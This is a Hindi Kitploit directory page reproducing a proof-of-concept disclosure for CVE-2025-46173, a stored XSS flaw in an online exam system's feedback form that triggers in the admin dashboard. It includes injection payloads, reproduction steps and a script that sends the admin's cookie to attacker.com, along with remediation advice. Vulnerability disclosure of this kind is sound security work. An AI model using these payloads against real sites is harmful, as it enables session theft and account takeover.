Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-46173 — CVE-2025-46173 के लिए PoC | Kitploit
उपकरण/GitHubGitHub/pruthuraut/cve-2025-46173
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubpruthuraut/cve-2025-46173

CVE-2025-46173

CVE-2025-46173 के लिए PoC

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-46173 - स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग (XSS) ऑनलाइन परीक्षा मास्टरिंग सिस्टम 1.0 में

📌 सारांश

CVE-2025-46173 code-projects द्वारा ऑनलाइन परीक्षा मास्टरिंग सिस्टम 1.0 में पाया गया एक स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी है। यह कमजोरी feedback.php घटक में मौजूद है जहाँ उपयोगकर्ता का इनपुट नाम फ़ील्ड में ठीक से स्वच्छ नहीं किया जाता है, जिससे एक दुर्भावनापूर्ण अभिनेता मनमाना जावास्क्रिप्ट इंजेक्ट कर सकता है। जब कोई व्यवस्थापक एडमिन डैशबोर्ड (dash.php) में इस फीडबैक को देखता है, तो पेलोड व्यवस्थापक के ब्राउज़र में निष्पादित हो जाता है, जिससे सत्र अपहरण और संभावित विशेषाधिकार वृद्धि होती है।


🧠 कमजोरी का विवरण

  • कमजोरी का प्रकार: स्टोर्ड क्रॉस साइट स्क्रिप्टिंग (XSS)
  • CVE-ID: CVE-2025-46173
  • विक्रेता: code-projects
  • उत्पाद: ऑनलाइन परीक्षा मास्टरिंग सिस्टम
  • प्रभावित संस्करण: 1.0
  • घटक: feedback.php, dash.php
  • हमला वेक्टर: दूरस्थ
  • प्रभाव: विशेषाधिकार वृद्धि, सत्र अपहरण

📷 प्रूफ ऑफ कॉन्सेप्ट

1. इंजेक्शन

एक उपयोगकर्ता फीडबैक फॉर्म में नाम फ़ील्ड में निम्नलिखित पेलोड सबमिट करता है:

root@kitploit:~
<script>alert(document.cookie)</script>

फीडबैक फॉर्म में पेलोड

2. ट्रिगर

जब व्यवस्थापक बाद में dash.php में सबमिट किए गए फीडबैक को देखता है, तो पेलोड निष्पादित होता है:

व्यवस्थापक XSS ट्रिगर

3. परिणाम

व्यवस्थापक का सत्र कुकी document.cookie के माध्यम से उजागर होता है, जिसे बाहर निकाला जा सकता है:

root@kitploit:~
<script>
  fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>

⚙️ पुनरुत्पादन के चरण

  1. code-projects से कमजोर संस्करण को क्लोन या सेट करें।

  2. localhost/exam/feedback.php पर जाएं।

  3. "Name" फ़ील्ड में भरें:

    root@kitploit:~
    <script>alert(document.cookie)</script>
    
  4. फॉर्म सबमिट करें।

  5. व्यवस्थापक के रूप में लॉगिन करें और फीडबैक देखने के लिए dash.php?q=3 पर जाएं।

  6. स्क्रिप्ट व्यवस्थापक के संदर्भ में निष्पादित होगी।


🔥 प्रभाव

सफल शोषण से एक दूरस्थ हमलावर निम्नलिखित कर सकता है:

  • व्यवस्थापक सत्र कुकी चुराना
  • व्यवस्थापक उपयोगकर्ता का प्रतिरूपण करना
  • पूर्ण प्रशासनिक पहुँच प्राप्त करना
  • परीक्षण डेटा को संशोधित या हटाना
  • विशेषाधिकार बढ़ाना

🔒 अनुशंसित सुधार

  • उपयोगकर्ता इनपुट को स्वच्छ करें HTML विशेष वर्णों (जैसे &, <, >, ") को एस्केप करके।
  • PHP के htmlspecialchars() या फ्रंटएंड सत्यापन + बैकएंड स्वच्छता संयोजन जैसी मजबूत स्वच्छता लाइब्रेरी का उपयोग करें।
  • सामग्री सुरक्षा नीति (CSP) लागू करें।
  • DOM में प्रस्तुत करने से पहले डेटा को एन्कोड करने पर विचार करें।

🔗 संदर्भ

  • ब्लाइंड क्रॉस-साइट स्क्रिप्टिंग (Invicti)
  • Acunetix - ब्लाइंड XSS का पता लगाना
  • OWASP XSS रोकथाम चीट शीट

👤 खोजकर्ता

प्रुथु राउत LinkedIn | TryHackMe शीर्ष 2% | GitHub


स्क्रीनशॉट केवल शैक्षिक उद्देश्यों के लिए हैं। सभी परीक्षण स्थानीय वातावरण में किए गए थे।

🎥 वीडियो PoC

डेमो वीडियो देखने के लिए यहाँ क्लिक करें


⚠️ अस्वीकरण

यह जानकारी केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान की गई है। इसका उपयोग उन सिस्टमों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।

टूल डाउनलोड करें